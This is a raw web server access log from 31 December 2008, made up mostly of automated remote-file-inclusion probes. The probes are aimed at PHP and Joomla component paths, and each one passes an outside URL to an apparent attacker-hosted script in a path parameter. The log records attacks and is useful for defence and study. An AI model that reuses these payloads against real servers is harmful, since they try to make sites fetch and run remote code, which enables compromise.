81.176.226.164 - - [31/Dec/2008:22:24:18 -0800] "GET /path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
81.176.226.164 - - [31/Dec/2008:22:24:18 -0800] "GET /logs/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:22:24:48 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:22:24:48 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:22:24:49 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:22:24:50 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:22:24:50 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:22:24:50 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:22:27:54 -0800] "GET /include/lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
62.45.154.56 - - [31/Dec/2008:22:29:53 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "site.inkjetcartridge.com"
62.45.154.56 - - [31/Dec/2008:22:29:59 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "site.inkjetcartridge.com"
70.87.63.234 - - [31/Dec/2008:22:38:23 -0800] "GET /logs/access_081101.log/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "site.inkjetcartridge.com"
70.87.63.234 - - [31/Dec/2008:22:38:23 -0800] "GET /path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "site.inkjetcartridge.com"
70.87.63.234 - - [31/Dec/2008:22:38:23 -0800] "GET /logs/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:38:36 -0800] "GET /logs/access.log//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:38:36 -0800] "GET /logs//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:38:36 -0800] "GET /components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:39:04 -0800] "GET /logs/access.log//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:39:04 -0800] "GET /components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:39:04 -0800] "GET /logs//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:39:12 -0800] "GET /components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:39:12 -0800] "GET /logs/access.log//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:39:12 -0800] "GET /logs//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:40:00 -0800] "GET /logs//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:40:00 -0800] "GET /components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
222.122.20.252 - - [31/Dec/2008:22:40:00 -0800] "GET /logs/access.log//components/errors.php?error=http://members.mywave.at/m206111aa/cms/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "site.inkjetcartridge.com"
62.173.161.208 - - [31/Dec/2008:22:40:31 -0800] "GET /logs/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "site.inkjetcartridge.com"
62.173.161.208 - - [31/Dec/2008:22:40:32 -0800] "GET /errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "site.inkjetcartridge.com"
62.173.161.208 - - [31/Dec/2008:22:42:38 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.173.161.208 - - [31/Dec/2008:22:42:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.173.161.208 - - [31/Dec/2008:22:42:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
69.64.37.160 - - [31/Dec/2008:22:43:53 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/cwx.shadow/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.64.37.160 - - [31/Dec/2008:22:43:53 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/cwx.shadow/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.64.37.160 - - [31/Dec/2008:22:43:53 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/cwx.shadow/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.56.65.208 - - [31/Dec/2008:22:47:22 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.56.65.208 - - [31/Dec/2008:22:47:23 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.56.65.208 - - [31/Dec/2008:22:47:23 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
67.210.123.75 - - [31/Dec/2008:22:47:26 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "site.inkjetcartridge.com"
67.210.123.75 - - [31/Dec/2008:22:47:26 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "site.inkjetcartridge.com"
67.210.123.75 - - [31/Dec/2008:22:49:02 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "site.inkjetcartridge.com"
81.56.65.208 - - [31/Dec/2008:22:51:06 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.56.65.208 - - [31/Dec/2008:22:51:07 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.56.65.208 - - [31/Dec/2008:22:51:07 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:22:52:19 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:22:52:19 -0800] "GET /logs/access.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:22:52:19 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.173.161.208 - - [31/Dec/2008:23:02:53 -0800] "GET /logs/access_081101.log//include/admin.lib.inc.php?site_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:04:35 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:04:35 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:04:38 -0800] "GET /logs/access.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:23:09:02 -0800] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:23:09:02 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:23:09:02 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:09:08 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:09:08 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:09:08 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:09:18 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:09:18 -0800] "GET /logs/access.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:09:19 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:09:19 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:09:19 -0800] "GET /logs/access.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.250.179.6 - - [31/Dec/2008:23:09:21 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:09:49 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:09:49 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:09:49 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "site.inkjetcartridge.com"
121.170.11.100 - - [31/Dec/2008:23:09:59 -0800] "GET /logs/access.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:11:35 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:11:35 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:11:35 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:16:16 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:16:16 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:16:17 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:21:20 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:21:20 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:21:22 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:21:28 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:21:28 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
212.34.140.136 - - [31/Dec/2008:23:21:28 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:22:25 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:22:26 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
140.130.101.5 - - [31/Dec/2008:23:22:27 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.giovaniemissione.it/media/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
69.72.250.130 - - [31/Dec/2008:23:23:10 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "site.inkjetcartridge.com"
69.72.250.130 - - [31/Dec/2008:23:23:11 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "site.inkjetcartridge.com"
66.111.110.158 - - [31/Dec/2008:23:23:11 -0800] "GET /links/links19.html HTTP/1.1" 200 29321 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "site.inkjetcartridge.com"
72.82.228.83 - - [31/Dec/2008:23:24:13 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
72.82.228.83 - - [31/Dec/2008:23:24:13 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.169.175.169 - - [31/Dec/2008:23:24:16 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "site.inkjetcartridge.com"
81.169.175.169 - - [31/Dec/2008:23:24:16 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "site.inkjetcartridge.com"
213.97.52.28 - - [31/Dec/2008:23:24:17 -0800] "GET /phpbb/viewtopic.php?p=9293 HTTP/1.0" 200 517 "http://www.inonlinegiochi.com/giocogioca_bluebeards_bounty_video_casinos_slots_machine_per_divertimento.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 3.0)" "site.inkjetcartridge.com"
66.34.133.35 - - [31/Dec/2008:23:26:12 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
66.34.133.35 - - [31/Dec/2008:23:26:12 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
201.238.240.118 - - [31/Dec/2008:23:29:13 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "site.inkjetcartridge.com"
201.238.240.118 - - [31/Dec/2008:23:29:13 -0800] "GET /logs/phphtml.php?htmlclass_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "site.inkjetcartridge.com"
201.238.240.118 - - [31/Dec/2008:23:29:13 -0800] "GET /phphtml.php?htmlclass_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "site.inkjetcartridge.com"
201.238.240.118 - - [31/Dec/2008:23:29:13 -0800] "GET /logs/access.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "site.inkjetcartridge.com"
201.238.240.118 - - [31/Dec/2008:23:29:13 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "site.inkjetcartridge.com"
201.238.240.118 - - [31/Dec/2008:23:29:13 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "site.inkjetcartridge.com"
